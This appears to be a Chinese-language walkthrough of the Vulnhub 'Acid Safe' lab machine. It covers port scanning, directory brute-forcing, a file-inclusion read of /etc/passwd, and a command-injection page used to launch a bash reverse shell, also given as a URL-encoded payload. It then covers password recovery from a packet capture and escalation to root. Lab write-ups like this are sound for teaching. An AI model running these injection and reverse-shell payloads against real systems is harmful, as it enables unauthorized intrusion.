利用namp 先进行扫描获取ip

nmap  192.168.18.*

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

获取ip  没发现80端口 主机存活  猜测可以是个2000以后的端口

nmap -p1-65533 192.168.18.146     返回

Vulnhub靶场渗透练习(四) Acid Safe 第1张

192.168.18.146:33447 开放33447端口

利用御剑和进行burpsuit 爆破 得到

imges ,index ,challenge 等目录  接着对其二次爆破

 Vulnhub靶场渗透练习(四) Acid Safe 第2张

cake 发现目录 /Magic_Box

访问include.php,这是一个文件包含漏洞页面 192.168.18.146:33447/Challenge/include.php?file=/etc/passwd&add=Extract+File Vulnhub靶场渗透练习(四) Acid Safe 第3张

 继续对/challenge /Magic_Box 爆破 发现 发现low.php,command.php

 访问low.php是个空页面,访问command.php,发现命令执行界面 这个时候直接反弹  

输入 127.0.0.1&&echo "bash -i >& /dev/tcp/192.168.18.1/4444 0>&1" | bash     在post get 继续传递的时候 && 会被当初参数传递

这里我们把 && 后门的转义 之后在bp 发包

Vulnhub靶场渗透练习(四) Acid Safe 第4张

IP=127.0.0.1%26%26%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%38%2e%31%2f%34%34%34%34%20%30%3e%26%31%22%20%7c%20%62%61%73%68&submit=submit

 这边接受到

Vulnhub靶场渗透练习(四) Acid Safe 第5张

接受输入 python -c 'import pty;pty.spawn("/bin/bash")'

可以执行su 命令终端 进去可以提权了

查看有哪些的用户 cat /etc/passwd ,发现需要关注的用户有:acid,saman,root   一般查看 id 大于1000 find / -user acid 2>/dev/null   查找用户文件 发现 Vulnhub靶场渗透练习(四) Acid Safe 第6张

将这个文件放到可以访问位置 利用python  搭建一个临时服务器

cd  /sbin/raw_vs_isi

  python -m SimpleHTTPServer 8888 在浏览器中访问   Vulnhub靶场渗透练习(四) Acid Safe 第7张

可以直接下载 也可以利用  s

 scp  进行本地远程下载

 scp /sbin/raw_vs_isi/hint.pcapng yzj@192.168.18.134:/home/yzj

Are you sure you want to continue connecting (yes/no)? yes

 yzj@192.168.18.134's password: a123456

成功  丢入 Wireshark 找到一个tcp 包 追踪tcp流量包

Vulnhub靶场渗透练习(四) Acid Safe 第8张

发现saman的密码:1337hax0r  su 切换 Vulnhub靶场渗透练习(四) Acid Safe 第9张  

sudo -i   尝试提权

Vulnhub靶场渗透练习(四) Acid Safe 第10张

发现root 密码也是1337hax0r 

 查看cat flag.txt 

Vulnhub靶场渗透练习(四) Acid Safe 第11张

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄